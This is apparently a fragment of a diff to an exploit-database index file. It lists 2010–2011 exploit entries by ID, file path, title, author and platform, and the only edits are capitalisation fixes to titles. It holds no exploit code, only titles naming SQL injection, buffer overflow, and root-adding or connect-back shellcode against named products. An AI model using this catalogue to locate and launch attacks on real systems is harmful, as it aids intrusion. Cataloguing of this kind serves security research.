-15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 +15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - Buffer Overflow (users.txt) (EggHunter)",2010-11-19,0v3r,windows,local,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 15578,platforms/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps,0 @@ -13552,9 +13552,9 @@ id,file,description,date,author,platform,type,port 15612,platforms/php/webapps/15612.txt,"SiteEngine 7.1 - SQL Injection",2010-11-25,Beach,php,webapps,0 15613,platforms/windows/dos/15613.py,"NCH Officeintercom 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",windows,dos,0 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 -15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 +15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 -15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 +15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15619,platforms/linux/dos/15619.c,"Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0 15620,platforms/linux/local/15620.sh,"systemtap - Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 @@ -13617,7 +13617,7 @@ id,file,description,date,author,platform,type,port 15681,platforms/asp/webapps/15681.txt,"ASPSiteware JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15682,platforms/asp/webapps/15682.txt,"ASPSiteware ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteware Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15684,platforms/php/webapps/15684.txt,"WordPress do_trackbacks() function - SQL Injection",2010-12-05,M4g,php,webapps,0 +15684,platforms/php/webapps/15684.txt,"Wordpress do_trackbacks() function - SQL Injection",2010-12-05,M4g,php,webapps,0 15685,platforms/php/webapps/15685.html,"phpKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery Exploit",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -13627,8 +13627,8 @@ id,file,description,date,author,platform,type,port 15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps,0 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - (.vsc) Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution Exploit",2010-12-06,Rew,windows,local,0 -15694,platforms/windows/dos/15694.txt,"Winzip 15.0 - WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 -15695,platforms/windows/dos/15695.txt,"Winzip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 +15694,platforms/windows/dos/15694.txt,"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 +15695,platforms/windows/dos/15695.txt,"WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution Exploit",2010-12-06,Rew,windows,local,0 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 - Safe Search for IE Denial of Service",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess Denial of Service PoC",2010-12-06,Dr_IDE,windows,dos,0 @@ -13645,7 +13645,7 @@ id,file,description,date,author,platform,type,port 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion Exploit",2010-12-09,Br0ly,php,webapps,0 -15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 +15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0 @@ -13727,7 +13727,7 @@ id,file,description,date,author,platform,type,port 15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 -15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 +15808,platforms/php/webapps/15808.txt,"Wordpress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit",2010-12-22,WooYun,windows,remote,0 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps,0 @@ -13770,7 +13770,7 @@ id,file,description,date,author,platform,type,port 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 -15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 +15858,platforms/php/webapps/15858.txt,"Wordpress 3.0.3 - Persistent Cross-Site Scripting (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 @@ -13811,7 +13811,7 @@ id,file,description,date,author,platform,type,port 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - SQL Injection / Authentication Bypass / Full Path Disclosure",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - Cross-Site Request Forgery / Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps,0 -15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion",2011-01-07,n0n0x,php,webapps,0 +15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,php,webapps,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service",2011-01-07,freak_out,windows,dos,0 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 @@ -13823,7 +13823,7 @@ id,file,description,date,author,platform,type,port 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote Denial of Service in RDS Service",2011-01-08,Pepelux,windows,dos,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local,0 15942,platforms/php/webapps/15942.txt,"sahana agasti 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 -15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 +15943,platforms/php/webapps/15943.txt,"Wordpress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 @@ -13884,7 +13884,7 @@ id,file,description,date,author,platform,type,port 16023,platforms/windows/dos/16023.c,"Panda Global Protection 2010 - Local Denial of Service (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos,0 16024,platforms/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0 -16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 portbind + fork shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 +16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 portbind + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16027,platforms/php/webapps/16027.txt,"phpcms 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0 16028,platforms/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - (bus) Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0 @@ -13917,7 +13917,7 @@ id,file,description,date,author,platform,type,port 16071,platforms/windows/local/16071.txt,"Microsoft Internet Explorer - MHTML Protocol Handler Cross-Site Scripting",2011-01-29,80vul,windows,local,0 16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices - Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0 -16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow (seh)",2011-01-29,m0nna,windows,local,0 +16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow (SEH)",2011-01-29,m0nna,windows,local,0 16074,platforms/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps,0 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 / 3.2.2 - Persistent Cross-Site Scripting via LinkBacks",2011-01-30,MaXe,php,webapps,0 @@ -13934,7 +13934,7 @@ id,file,description,date,author,platform,type,port 16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput Cross-Site Scripting Bypass",2011-02-01,"Jeff Channell",php,webapps,0 16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow",2011-02-01,sup3r,windows,local,0 -16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps,0 +16094,platforms/php/webapps/16094.txt,"Raja Natarajan GuestBook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client - .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 16097,platforms/php/webapps/16097.txt,"Zikula CMS 1.2.4 - Cross-Site Request Forgery",2011-02-02,"Aung Khant",php,webapps,0 @@ -13949,7 +13949,7 @@ id,file,description,date,author,platform,type,port 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16109,platforms/php/webapps/16109.txt,"podcast generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 -16113,platforms/php/webapps/16113.txt,"oscommerce - authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 +16113,platforms/php/webapps/16113.txt,"osCommerce - authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps,0 @@ -13957,14 +13957,14 @@ id,file,description,date,author,platform,type,port 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 WordPress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Persistent Cross-Site Scripting via useragent http header Injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow Denial of Service PoC",2011-02-07,kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 - 'index.php' SQL Injection",2011-02-07,ahmadso,php,webapps,0 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 -16133,platforms/windows/local/16133.htm,"AoA Mp4 converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 +16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16134,platforms/php/webapps/16134.txt,"Model Agentur Script - SQL Injection",2011-02-08,NoNameMT,php,webapps,0 16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",php,webapps,0 16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",php,webapps,0 @@ -13976,7 +13976,7 @@ id,file,description,date,author,platform,type,port 16167,platforms/php/webapps/16167.txt,"jSchool Advanced - SQL Injection",2011-02-14,eXa.DisC,php,webapps,0 16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0 -16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 +16144,platforms/php/webapps/16144.txt,"Enable Media Replace Wordpress Plugin - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote,0 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 @@ -14005,7 +14005,7 @@ id,file,description,date,author,platform,type,port 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service",2011-02-17,b0telh0,windows,dos,0 -16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Plugin - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 +16181,platforms/php/webapps/16181.txt,"Wordpress User Photo Component Plugin - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 @@ -14026,14 +14026,14 @@ id,file,description,date,author,platform,type,port 16203,platforms/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,windows,dos,0 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0 -16207,platforms/php/webapps/16207.txt,"dotproject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 +16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0 16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0 16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary Upload",2011-02-23,"AutoSec Tools",php,webapps,0 -16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 WordPress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats - (player.php) SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0 @@ -14042,11 +14042,11 @@ id,file,description,date,author,platform,type,port 16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0 16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 -16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 WordPress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 -16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 WordPress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 +16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 +16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0 16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0 -16235,platforms/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",php,webapps,0 -16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 WordPress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 +16235,platforms/php/webapps/16235.txt,"Wordpress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",php,webapps,0 +16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 Wordpress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 16239,platforms/hardware/remote/16239.txt,"iPhone Guitar - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 @@ -14060,8 +14060,8 @@ id,file,description,date,author,platform,type,port 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 -16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 -16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 +16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 +16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - (.cda) Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14077,7 +14077,7 @@ id,file,description,date,author,platform,type,port 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 -16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 +16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 Wordpress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - (view.php) SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 @@ -14085,7 +14085,7 @@ id,file,description,date,author,platform,type,port 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0 16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Pre-Authenticated Local File Inclusion Exploit",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne - (description.php) SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 -16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 +16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve",2010-08-07,Metasploit,unix,dos,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 @@ -14097,7 +14097,7 @@ id,file,description,date,author,platform,type,port 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization 